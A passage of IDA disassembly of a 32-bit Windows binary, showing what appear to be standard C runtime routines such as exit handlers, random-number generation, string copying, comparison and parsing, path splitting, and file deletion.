; =============== S U B R O U T I N E =======================================
sub_41C164 proc near ; CODE XREF: .text:0041E266�p
mov eax, off_43AE1C
test eax, eax
jz short loc_41C16F
call eax ; sub_41D124
loc_41C16F: ; CODE XREF: sub_41C164+7�j
push offset dword_429028
push offset dword_429014
call sub_41C24C
push offset dword_429010
push offset dword_429000
call sub_41C24C
add esp, 10h
retn
sub_41C164 endp
; =============== S U B R O U T I N E =======================================
sub_41C191 proc near ; CODE XREF: .text:0041E2A5�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_41C1B3
add esp, 0Ch
retn
sub_41C191 endp
; =============== S U B R O U T I N E =======================================
sub_41C1A2 proc near ; CODE XREF: .text:0041E2C4�p
; sub_41E2C9+1C�p ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_41C1B3
add esp, 0Ch
retn
sub_41C1A2 endp
; =============== S U B R O U T I N E =======================================
sub_41C1B3 proc near ; CODE XREF: sub_41C191+8�p
; sub_41C1A2+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_4DBE24, edi
jnz short loc_41C1D0
push [esp+4+arg_0]
call ds:dword_427104 ; GetCurrentProcess
push eax
call ds:dword_4270FC ; TerminateProcess
loc_41C1D0: ; CODE XREF: sub_41C1B3+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_4DBE20, edi
mov byte_4DBE1C, bl
jnz short loc_41C224
mov eax, dword_4DD39C
test eax, eax
jz short loc_41C213
mov ecx, dword_4DD398
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_41C212
loc_41C1FF: ; CODE XREF: sub_41C1B3+5D�j
mov eax, [esi]
test eax, eax
jz short loc_41C207
call eax
loc_41C207: ; CODE XREF: sub_41C1B3+50�j
sub esi, 4
cmp esi, dword_4DD39C
jnb short loc_41C1FF
loc_41C212: ; CODE XREF: sub_41C1B3+4A�j
pop esi
loc_41C213: ; CODE XREF: sub_41C1B3+3C�j
push offset dword_429034
push offset dword_42902C
call sub_41C24C
pop ecx
pop ecx
loc_41C224: ; CODE XREF: sub_41C1B3+33�j
push offset dword_429040
push offset dword_429038
call sub_41C24C
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_41C24A
push [esp+4+arg_0]
mov dword_4DBE24, edi
call ds:dword_42706C ; ExitProcess
loc_41C24A: ; CODE XREF: sub_41C1B3+85�j
pop edi
retn
sub_41C1B3 endp
; =============== S U B R O U T I N E =======================================
sub_41C24C proc near ; CODE XREF: sub_41C164+15�p
; sub_41C164+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_41C251: ; CODE XREF: sub_41C24C+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_41C264
mov eax, [esi]
test eax, eax
jz short loc_41C25F
call eax
loc_41C25F: ; CODE XREF: sub_41C24C+F�j
add esi, 4
jmp short loc_41C251
; ---------------------------------------------------------------------------
loc_41C264: ; CODE XREF: sub_41C24C+9�j
pop esi
retn
sub_41C24C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C266 proc near ; CODE XREF: sub_401221+18F�p
; sub_401221+295�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
lea eax, [ebp+arg_8]
mov [ebp+var_14], 42h
push eax
lea eax, [ebp+var_20]
push [ebp+arg_4]
mov [ebp+var_1C], 7FFFFFFFh
push eax
call sub_41FF3F
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41C2A6
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41C2B3
; ---------------------------------------------------------------------------
loc_41C2A6: ; CODE XREF: sub_41C266+36�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41FE2A
pop ecx
pop ecx
loc_41C2B3: ; CODE XREF: sub_41C266+3E�j
mov eax, esi
pop esi
leave
retn
sub_41C266 endp
; =============== S U B R O U T I N E =======================================
sub_41C2B8 proc near ; CODE XREF: sub_401221+45�p
; sub_401ACD+315E�p ...
arg_0 = dword ptr 4
mov eax, [esp+arg_0]
mov dword_43AE00, eax
retn
sub_41C2B8 endp
; =============== S U B R O U T I N E =======================================
sub_41C2C2 proc near ; CODE XREF: sub_401221:loc_401379�p
; sub_401221:loc_4016A7�p ...
mov eax, dword_43AE00
imul eax, 343FDh
add eax, 269EC3h
mov dword_43AE00, eax
sar eax, 10h
and eax, 7FFFh
retn
sub_41C2C2 endp
; =============== S U B R O U T I N E =======================================
sub_41C2E0 proc near ; CODE XREF: sub_401221:loc_40134E�p
; sub_401ACD+8C�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_4]
push edi
push ebx
push esi
mov dl, [ecx]
mov edi, [esp+0Ch+arg_0]
test dl, dl
jz short loc_41C35A
mov dh, [ecx+1]
test dh, dh
jz short loc_41C347
loc_41C2F8: ; CODE XREF: sub_41C2E0+52�j
; sub_41C2E0+65�j
mov esi, edi
mov ecx, [esp+0Ch+arg_4]
mov al, [edi]
inc esi
cmp al, dl
jz short loc_41C31A
test al, al
jz short loc_41C314
loc_41C309: ; CODE XREF: sub_41C2E0+32�j
mov al, [esi]
inc esi
loc_41C30C: ; CODE XREF: sub_41C2E0+3F�j
cmp al, dl
jz short loc_41C31A
test al, al
jnz short loc_41C309
loc_41C314: ; CODE XREF: sub_41C2E0+27�j
pop esi
pop ebx
pop edi
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_41C31A: ; CODE XREF: sub_41C2E0+23�j
; sub_41C2E0+2E�j
mov al, [esi]
inc esi
cmp al, dh
jnz short loc_41C30C
lea edi, [esi-1]
loc_41C324: ; CODE XREF: sub_41C2E0+63�j
mov ah, [ecx+2]
test ah, ah
jz short loc_41C353
mov al, [esi]
add esi, 2
cmp al, ah
jnz short loc_41C2F8
mov al, [ecx+3]
test al, al
jz short loc_41C353
mov ah, [esi-1]
add ecx, 2
cmp al, ah
jz short loc_41C324
jmp short loc_41C2F8
; ---------------------------------------------------------------------------
loc_41C347: ; CODE XREF: sub_41C2E0+16�j
xor eax, eax
pop esi
pop ebx
pop edi
mov al, dl
jmp loc_41C996
; ---------------------------------------------------------------------------
loc_41C353: ; CODE XREF: sub_41C2E0+49�j
; sub_41C2E0+59�j
lea eax, [edi-1]
pop esi
pop ebx
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C35A: ; CODE XREF: sub_41C2E0+F�j
mov eax, edi
pop esi
pop ebx
pop edi
retn
sub_41C2E0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C360 proc near ; CODE XREF: sub_401221+11A�p
; sub_401ACD+1C15�p ...
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = byte ptr 14h
push ebp
mov ebp, esp
sub esp, 20h
mov eax, [ebp+arg_0]
push esi
mov [ebp+var_18], eax
mov [ebp+var_20], eax
mov eax, [ebp+arg_4]
mov [ebp+var_14], 42h
mov [ebp+var_1C], eax
lea eax, [ebp+arg_C]
push eax
lea eax, [ebp+var_20]
push [ebp+arg_8]
push eax
call sub_41FF3F
add esp, 0Ch
dec [ebp+var_1C]
mov esi, eax
js short loc_41C39F
mov eax, [ebp+var_20]
and byte ptr [eax], 0
jmp short loc_41C3AC
; ---------------------------------------------------------------------------
loc_41C39F: ; CODE XREF: sub_41C360+35�j
lea eax, [ebp+var_20]
push eax
push 0
call sub_41FE2A
pop ecx
pop ecx
loc_41C3AC: ; CODE XREF: sub_41C360+3D�j
mov eax, esi
pop esi
leave
retn
sub_41C360 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C3B1 proc near ; CODE XREF: sub_401221+F7�p
; sub_401ACD+2177�p ...
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push ebx
mov ebx, [ebp+arg_0]
push esi
push edi
push ebx
call sub_41B9C0
cmp eax, 1
pop ecx
jb short loc_41C3EC
cmp byte ptr [ebx+1], 3Ah
jnz short loc_41C3EC
mov esi, [ebp+arg_4]
test esi, esi
jz short loc_41C3E8
push 2
push ebx
push esi
call sub_420B29
add esp, 0Ch
and byte ptr [esi+2], 0
loc_41C3E8: ; CODE XREF: sub_41C3B1+25�j
inc ebx
inc ebx
jmp short loc_41C3F6
; ---------------------------------------------------------------------------
loc_41C3EC: ; CODE XREF: sub_41C3B1+18�j
; sub_41C3B1+1E�j
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41C3F6
and byte ptr [eax], 0
loc_41C3F6: ; CODE XREF: sub_41C3B1+39�j
; sub_41C3B1+40�j
and [ebp+arg_4], 0
cmp byte ptr [ebx], 0
mov eax, ebx
mov esi, 0FFh
mov [ebp+arg_0], eax
jz short loc_41C46E
loc_41C409: ; CODE XREF: sub_41C3B1+87�j
mov cl, [eax]
movzx edx, cl
test byte_4DD261[edx], 4
jz short loc_41C41A
inc eax
jmp short loc_41C434
; ---------------------------------------------------------------------------
loc_41C41A: ; CODE XREF: sub_41C3B1+64�j
cmp cl, 2Fh
jz short loc_41C42E
cmp cl, 5Ch
jz short loc_41C42E
cmp cl, 2Eh
jnz short loc_41C434
mov [ebp+var_4], eax
jmp short loc_41C434
; ---------------------------------------------------------------------------
loc_41C42E: ; CODE XREF: sub_41C3B1+6C�j
; sub_41C3B1+71�j
lea ecx, [eax+1]
mov [ebp+arg_4], ecx
loc_41C434: ; CODE XREF: sub_41C3B1+67�j
; sub_41C3B1+76�j ...
inc eax
cmp byte ptr [eax], 0
jnz short loc_41C409
mov edi, [ebp+arg_4]
mov [ebp+arg_0], eax
test edi, edi
jz short loc_41C46E
cmp [ebp+arg_8], 0
jz short loc_41C469
sub edi, ebx
cmp edi, esi
jb short loc_41C452
mov edi, esi
loc_41C452: ; CODE XREF: sub_41C3B1+9D�j
push edi
push ebx
push [ebp+arg_8]
call sub_420B29
mov eax, [ebp+arg_8]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_41C469: ; CODE XREF: sub_41C3B1+97�j
mov ebx, [ebp+arg_4]
jmp short loc_41C478
; ---------------------------------------------------------------------------
loc_41C46E: ; CODE XREF: sub_41C3B1+56�j
; sub_41C3B1+91�j
mov ecx, [ebp+arg_8]
test ecx, ecx
jz short loc_41C478
and byte ptr [ecx], 0
loc_41C478: ; CODE XREF: sub_41C3B1+BB�j
; sub_41C3B1+C2�j
mov edi, [ebp+var_4]
test edi, edi
jz short loc_41C4CB
cmp edi, ebx
jb short loc_41C4CB
cmp [ebp+arg_C], 0
jz short loc_41C4A8
sub edi, ebx
cmp edi, esi
jb short loc_41C491
mov edi, esi
loc_41C491: ; CODE XREF: sub_41C3B1+DC�j
push edi
push ebx
push [ebp+arg_C]
call sub_420B29
mov eax, [ebp+arg_C]
add esp, 0Ch
and byte ptr [edi+eax], 0
mov eax, [ebp+arg_0]
loc_41C4A8: ; CODE XREF: sub_41C3B1+D6�j
mov edi, [ebp+arg_10]
test edi, edi
jz short loc_41C4F3
sub eax, [ebp+var_4]
cmp eax, esi
jnb short loc_41C4B8
mov esi, eax
loc_41C4B8: ; CODE XREF: sub_41C3B1+103�j
push esi
push [ebp+var_4]
push edi
call sub_420B29
add esp, 0Ch
and byte ptr [esi+edi], 0
jmp short loc_41C4F3
; ---------------------------------------------------------------------------
loc_41C4CB: ; CODE XREF: sub_41C3B1+CC�j
; sub_41C3B1+D0�j
mov edi, [ebp+arg_C]
test edi, edi
jz short loc_41C4E9
sub eax, ebx
cmp eax, esi
jnb short loc_41C4DA
mov esi, eax
loc_41C4DA: ; CODE XREF: sub_41C3B1+125�j
push esi
push ebx
push edi
call sub_420B29
add esp, 0Ch
and byte ptr [esi+edi], 0
loc_41C4E9: ; CODE XREF: sub_41C3B1+11F�j
mov eax, [ebp+arg_10]
test eax, eax
jz short loc_41C4F3
and byte ptr [eax], 0
loc_41C4F3: ; CODE XREF: sub_41C3B1+FC�j
; sub_41C3B1+118�j ...
pop edi
pop esi
pop ebx
leave
retn
sub_41C3B1 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C500 proc near ; CODE XREF: sub_401955+8�p
; sub_401ACD+8�p ...
arg_0 = byte ptr 4
push ecx
cmp eax, 1000h
lea ecx, [esp+4+arg_0]
jb short loc_41C520
loc_41C50C: ; CODE XREF: sub_41C500+1E�j
sub ecx, 1000h
sub eax, 1000h
test [ecx], eax
cmp eax, 1000h
jnb short loc_41C50C
loc_41C520: ; CODE XREF: sub_41C500+A�j
sub ecx, eax
mov eax, esp
test [ecx], eax
mov esp, ecx
mov ecx, [eax]
mov eax, [eax+4]
push eax
retn
sub_41C500 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C52F proc near ; CODE XREF: sub_401ACD+73F5�p
; sub_401ACD+7424�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 0
push ebx
mov ebx, [ebp+arg_0]
push edi
mov edi, ebx
jg short loc_41C543
xor eax, eax
jmp short loc_41C579
; ---------------------------------------------------------------------------
loc_41C543: ; CODE XREF: sub_41C52F+E�j
dec [ebp+arg_4]
push esi
jz short loc_41C573
mov esi, [ebp+arg_8]
loc_41C54C: ; CODE XREF: sub_41C52F+42�j
dec dword ptr [esi+4]
js short loc_41C55B
mov ecx, [esi]
movzx eax, byte ptr [ecx]
inc ecx
mov [esi], ecx
jmp short loc_41C562
; ---------------------------------------------------------------------------
loc_41C55B: ; CODE XREF: sub_41C52F+20�j
push esi
call sub_41F8E3
pop ecx
loc_41C562: ; CODE XREF: sub_41C52F+2A�j
cmp eax, 0FFFFFFFFh
jz short loc_41C57D
mov [edi], al
inc edi
cmp al, 0Ah
jz short loc_41C573
dec [ebp+arg_4]
jnz short loc_41C54C
loc_41C573: ; CODE XREF: sub_41C52F+18�j
; sub_41C52F+3D�j ...
and byte ptr [edi], 0
loc_41C576: ; CODE XREF: sub_41C52F+55�j
mov eax, ebx
pop esi
loc_41C579: ; CODE XREF: sub_41C52F+12�j
pop edi
pop ebx
pop ebp
retn
; ---------------------------------------------------------------------------
loc_41C57D: ; CODE XREF: sub_41C52F+36�j
cmp edi, [ebp+arg_0]
jnz short loc_41C573
xor ebx, ebx
jmp short loc_41C576
sub_41C52F endp
; =============== S U B R O U T I N E =======================================
sub_41C586 proc near ; CODE XREF: sub_41E52A+11B�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 0
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41C59D
add esp, 10h
retn
sub_41C586 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C59D proc near ; CODE XREF: sub_41C586+E�p
; sub_41C7A5+E�p
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
and [ebp+var_8], 0
push esi
push edi
mov edi, [ebp+arg_0]
mov bl, [edi]
lea esi, [edi+1]
mov [ebp+var_4], esi
loc_41C5B5: ; CODE XREF: sub_41C59D+46�j
cmp dword_43D084, 1
jle short loc_41C5CD
movzx eax, bl
push 8
push eax
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_41C5DC
; ---------------------------------------------------------------------------
loc_41C5CD: ; CODE XREF: sub_41C59D+1F�j
mov ecx, off_43CE78
movzx eax, bl
mov al, [ecx+eax*2]
and eax, 8
loc_41C5DC: ; CODE XREF: sub_41C59D+2E�j
test eax, eax
jz short loc_41C5E5
mov bl, [esi]
inc esi
jmp short loc_41C5B5
; ---------------------------------------------------------------------------
loc_41C5E5: ; CODE XREF: sub_41C59D+41�j
cmp bl, 2Dh
mov [ebp+var_4], esi
jnz short loc_41C5F3
or [ebp+arg_C], 2
jmp short loc_41C5F8
; ---------------------------------------------------------------------------
loc_41C5F3: ; CODE XREF: sub_41C59D+4E�j
cmp bl, 2Bh
jnz short loc_41C5FE
loc_41C5F8: ; CODE XREF: sub_41C59D+54�j
mov bl, [esi]
inc esi
mov [ebp+var_4], esi
loc_41C5FE: ; CODE XREF: sub_41C59D+59�j
mov eax, [ebp+arg_8]
test eax, eax
jl loc_41C795
cmp eax, 1
jz loc_41C795
cmp eax, 24h
jg loc_41C795
push 10h
test eax, eax
pop ecx
jnz short loc_41C646
cmp bl, 30h
jz short loc_41C630
mov [ebp+arg_8], 0Ah
jmp short loc_41C662
; ---------------------------------------------------------------------------
loc_41C630: ; CODE XREF: sub_41C59D+88�j
mov al, [esi]
cmp al, 78h
jz short loc_41C643
cmp al, 58h
jz short loc_41C643
mov [ebp+arg_8], 8
jmp short loc_41C662
; ---------------------------------------------------------------------------
loc_41C643: ; CODE XREF: sub_41C59D+97�j
; sub_41C59D+9B�j
mov [ebp+arg_8], ecx
loc_41C646: ; CODE XREF: sub_41C59D+83�j
cmp [ebp+arg_8], ecx
jnz short loc_41C662
cmp bl, 30h
jnz short loc_41C662
mov al, [esi]
cmp al, 78h
jz short loc_41C65A
cmp al, 58h
jnz short loc_41C662
loc_41C65A: ; CODE XREF: sub_41C59D+B7�j
mov bl, [esi+1]
inc esi
inc esi
mov [ebp+var_4], esi
loc_41C662: ; CODE XREF: sub_41C59D+91�j
; sub_41C59D+A4�j ...
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
mov edi, 103h
mov [ebp+var_C], eax
loc_41C672: ; CODE XREF: sub_41C59D+16C�j
cmp dword_43D084, 1
movzx esi, bl
jle short loc_41C68A
push 4
push esi
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_41C695
; ---------------------------------------------------------------------------
loc_41C68A: ; CODE XREF: sub_41C59D+DF�j
mov eax, off_43CE78
mov al, [eax+esi*2]
and eax, 4
loc_41C695: ; CODE XREF: sub_41C59D+EB�j
test eax, eax
jz short loc_41C6A1
movsx ecx, bl
sub ecx, 30h
jmp short loc_41C6D3
; ---------------------------------------------------------------------------
loc_41C6A1: ; CODE XREF: sub_41C59D+FA�j
cmp dword_43D084, 1
jle short loc_41C6B5
push edi
push esi
call sub_41FDB5
pop ecx
pop ecx
jmp short loc_41C6C0
; ---------------------------------------------------------------------------
loc_41C6B5: ; CODE XREF: sub_41C59D+10B�j
mov eax, off_43CE78
mov ax, [eax+esi*2]
and eax, edi
loc_41C6C0: ; CODE XREF: sub_41C59D+116�j
test eax, eax
jz short loc_41C70E
movsx eax, bl
push eax
call sub_420BB3
pop ecx
mov ecx, eax
sub ecx, 37h
loc_41C6D3: ; CODE XREF: sub_41C59D+102�j
cmp ecx, [ebp+arg_8]
jnb short loc_41C70E
mov esi, [ebp+var_8]
or [ebp+arg_C], 8
cmp esi, [ebp+var_C]
jb short loc_41C6F8
jnz short loc_41C6F2
or eax, 0FFFFFFFFh
xor edx, edx
div [ebp+arg_8]
cmp ecx, edx
jbe short loc_41C6F8
loc_41C6F2: ; CODE XREF: sub_41C59D+147�j
or [ebp+arg_C], 4
jmp short loc_41C701
; ---------------------------------------------------------------------------
loc_41C6F8: ; CODE XREF: sub_41C59D+145�j
; sub_41C59D+153�j
imul esi, [ebp+arg_8]
add esi, ecx
mov [ebp+var_8], esi
loc_41C701: ; CODE XREF: sub_41C59D+159�j
mov eax, [ebp+var_4]
inc [ebp+var_4]
mov bl, [eax]
jmp loc_41C672
; ---------------------------------------------------------------------------
loc_41C70E: ; CODE XREF: sub_41C59D+125�j
; sub_41C59D+139�j
mov ecx, [ebp+arg_C]
dec [ebp+var_4]
mov edx, [ebp+arg_4]
test cl, 8
jnz short loc_41C72C
test edx, edx
jz short loc_41C726
mov eax, [ebp+arg_0]
mov [ebp+var_4], eax
loc_41C726: ; CODE XREF: sub_41C59D+181�j
and [ebp+var_8], 0
jmp short loc_41C779
; ---------------------------------------------------------------------------
loc_41C72C: ; CODE XREF: sub_41C59D+17D�j
test cl, 4
mov eax, 7FFFFFFFh
jnz short loc_41C752
test cl, 1
jnz short loc_41C779
and ecx, 2
jz short loc_41C749
cmp [ebp+var_8], 80000000h
ja short loc_41C752
loc_41C749: ; CODE XREF: sub_41C59D+1A1�j
test ecx, ecx
jnz short loc_41C779
cmp [ebp+var_8], eax
jbe short loc_41C779
loc_41C752: ; CODE XREF: sub_41C59D+197�j
; sub_41C59D+1AA�j
test byte ptr [ebp+arg_C], 1
mov dword_4DBDDC, 22h
jz short loc_41C768
or [ebp+var_8], 0FFFFFFFFh
jmp short loc_41C779
; ---------------------------------------------------------------------------
loc_41C768: ; CODE XREF: sub_41C59D+1C3�j
mov ecx, [ebp+arg_C]
and cl, 2
neg cl
sbb ecx, ecx
neg ecx
add ecx, eax
mov [ebp+var_8], ecx
loc_41C779: ; CODE XREF: sub_41C59D+18D�j
; sub_41C59D+19C�j ...
test edx, edx
jz short loc_41C782
mov eax, [ebp+var_4]
mov [edx], eax
loc_41C782: ; CODE XREF: sub_41C59D+1DE�j
test byte ptr [ebp+arg_C], 2
jz short loc_41C790
mov eax, [ebp+var_8]
neg eax
mov [ebp+var_8], eax
loc_41C790: ; CODE XREF: sub_41C59D+1E9�j
mov eax, [ebp+var_8]
jmp short loc_41C7A0
; ---------------------------------------------------------------------------
loc_41C795: ; CODE XREF: sub_41C59D+66�j
; sub_41C59D+6F�j ...
mov eax, [ebp+arg_4]
test eax, eax
jz short loc_41C79E
mov [eax], edi
loc_41C79E: ; CODE XREF: sub_41C59D+1FD�j
xor eax, eax
loc_41C7A0: ; CODE XREF: sub_41C59D+1F6�j
pop edi
pop esi
pop ebx
leave
retn
sub_41C59D endp
; =============== S U B R O U T I N E =======================================
sub_41C7A5 proc near ; CODE XREF: sub_401ACD+60F0�p
; sub_401ACD+6931�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push 1
push [esp+4+arg_8]
push [esp+8+arg_4]
push [esp+0Ch+arg_0]
call sub_41C59D
add esp, 10h
retn
sub_41C7A5 endp
; =============== S U B R O U T I N E =======================================
sub_41C7BC proc near ; CODE XREF: sub_401ACD+58AD�p
arg_0 = dword ptr 4
push [esp+arg_0]
call ds:dword_427088 ; DeleteFileA
test eax, eax
jnz short loc_41C7D2
call ds:dword_427094 ; RtlGetLastWin32Error
jmp short loc_41C7D4
; ---------------------------------------------------------------------------
loc_41C7D2: ; CODE XREF: sub_41C7BC+C�j
xor eax, eax
loc_41C7D4: ; CODE XREF: sub_41C7BC+14�j
test eax, eax
jz short loc_41C7E3
push eax
call sub_420C7F
pop ecx
or eax, 0FFFFFFFFh
retn
; ---------------------------------------------------------------------------
loc_41C7E3: ; CODE XREF: sub_41C7BC+1A�j
xor eax, eax
retn
sub_41C7BC endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C7E6 proc near ; CODE XREF: sub_401ACD+5801�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = byte ptr 10h
push ebp
mov ebp, esp
push esi
push edi
push [ebp+arg_0]
call sub_420CE6
mov esi, eax
lea eax, [ebp+arg_8]
push eax
push [ebp+arg_4]
push [ebp+arg_0]
call sub_41FF3F
push [ebp+arg_0]
mov edi, eax
push esi
call sub_420D73
add esp, 18h
mov eax, edi
pop edi
pop esi
pop ebp
retn
sub_41C7E6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C820 proc near ; CODE XREF: sub_401ACD+1E1F�p
; sub_401ACD+1E3E�p ...
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
push edi
mov edi, [ebp+arg_0]
xor eax, eax
or ecx, 0FFFFFFFFh
repne scasb
inc ecx
neg ecx
dec edi
mov al, [ebp+arg_4]
std
repne scasb
inc edi
cmp [edi], al
jz short loc_41C841
xor eax, eax
jmp short loc_41C843
; ---------------------------------------------------------------------------
loc_41C841: ; CODE XREF: sub_41C820+1B�j
mov eax, edi
loc_41C843: ; CODE XREF: sub_41C820+1F�j
cld
pop edi
leave
retn
sub_41C820 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_41C850 proc near ; CODE XREF: sub_401ACD+854�p
; sub_41E52A+93�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
push edi
push esi
push ebx
mov ecx, [ebp+arg_8]
jecxz short loc_41C881
mov ebx, ecx
mov edi, [ebp+arg_0]
mov esi, edi
xor eax, eax
repne scasb
neg ecx
add ecx, ebx
mov edi, esi
mov esi, [ebp+arg_4]
repe cmpsb
mov al, [esi-1]
xor ecx, ecx
cmp al, [edi-1]
ja short loc_41C87F
jz short loc_41C881
dec ecx
dec ecx
loc_41C87F: ; CODE XREF: sub_41C850+29�j
not ecx
loc_41C881: ; CODE XREF: sub_41C850+9�j
; sub_41C850+2B�j
mov eax, ecx
pop ebx
pop esi
pop edi
leave
retn
sub_41C850 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C890 proc near ; CODE XREF: sub_401ACD+42D�p
; sub_401ACD+2FB3�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_41C901
sub_41C890 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_41C8A0 proc near ; CODE XREF: sub_401ACD+436�p
; sub_401ACD+746F�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_41C8BC
loc_41C8AD: ; CODE XREF: sub_41C8A0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_41C8EF
test ecx, 3
jnz short loc_41C8AD
loc_41C8BC: ; CODE XREF: sub_41C8A0+B�j
; sub_41C8A0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_41C8BC
mov eax, [ecx-4]
test al, al
jz short loc_41C8FE
test ah, ah
jz short loc_41C8F9
test eax, 0FF0000h
jz short loc_41C8F4
test eax, 0FF000000h
jz short loc_41C8EF
jmp short loc_41C8BC
; ---------------------------------------------------------------------------
loc_41C8EF: ; CODE XREF: sub_41C8A0+12�j
; sub_41C8A0+4B�j
lea edi, [ecx-1]
jmp short loc_41C901
; ---------------------------------------------------------------------------
loc_41C8F4: ; CODE XREF: sub_41C8A0+44�j
lea edi, [ecx-2]
jmp short loc_41C901
; ---------------------------------------------------------------------------
loc_41C8F9: ; CODE XREF: sub_41C8A0+3D�j
lea edi, [ecx-3]
jmp short loc_41C901
; ---------------------------------------------------------------------------
loc_41C8FE: ; CODE XREF: sub_41C8A0+39�j
lea edi, [ecx-4]
loc_41C901: ; CODE XREF: sub_41C890+5�j
; sub_41C8A0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_41C926
loc_41C90D: ; CODE XREF: sub_41C8A0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_41C978
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_41C90D
jmp short loc_41C926
; ---------------------------------------------------------------------------
loc_41C921: ; CODE XREF: sub_41C8A0+9E�j
; sub_41C8A0+B8�j
mov [edi], edx
add edi, 4
loc_41C926: ; CODE XREF: sub_41C8A0+6B�j
; sub_41C8A0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_41C921
test dl, dl
jz short loc_41C978
test dh, dh
jz short loc_41C96F
test edx, 0FF0000h
jz short loc_41C962
test edx, 0FF000000h
jz short loc_41C95A
jmp short loc_41C921
; ---------------------------------------------------------------------------
loc_41C95A: ; CODE XREF: sub_41C8A0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C962: ; CODE XREF: sub_41C8A0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C96F: ; CODE XREF: sub_41C8A0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_41C978: ; CODE XREF: sub_41C8A0+72�j
; sub_41C8A0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_41C8A0 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_41C990
loc_41C980: ; CODE XREF: sub_41C990+1D�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_41C990
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
